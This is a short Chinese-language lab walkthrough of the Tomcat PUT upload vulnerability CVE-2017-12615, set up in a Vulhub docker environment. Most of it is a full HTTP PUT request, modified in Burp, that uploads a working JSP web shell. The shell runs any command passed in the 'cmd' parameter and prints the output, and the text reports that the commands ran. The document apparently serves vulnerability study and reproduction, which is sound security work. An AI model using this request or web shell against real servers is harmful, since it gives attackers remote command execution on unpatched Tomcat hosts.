环境搭建:
切换到vulhub对应目录
docker-compose build
docker-compose up -d
漏洞产生原因
Tomcat配置问题,配置了可写(readonly=false),导致我们可以往服务器写文件。
访问搭建好的靶场,靶场搭建成功。
burp抓包发送到repeater模块儿。
修改数据报如下
PUT /3.jsp/ HTTP/1.1
Host: 192.168.253.168:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=D8D5F04F5570AE020EF1C31927F37AD3
Upgrade-Insecure-Requests: 1
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));//jie's
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
修改后发送。如上图为上传成功。
浏览器访问上传的shell脚本并传入参数。命令执行返回了相关结果。
参考:
-
http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
-
https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md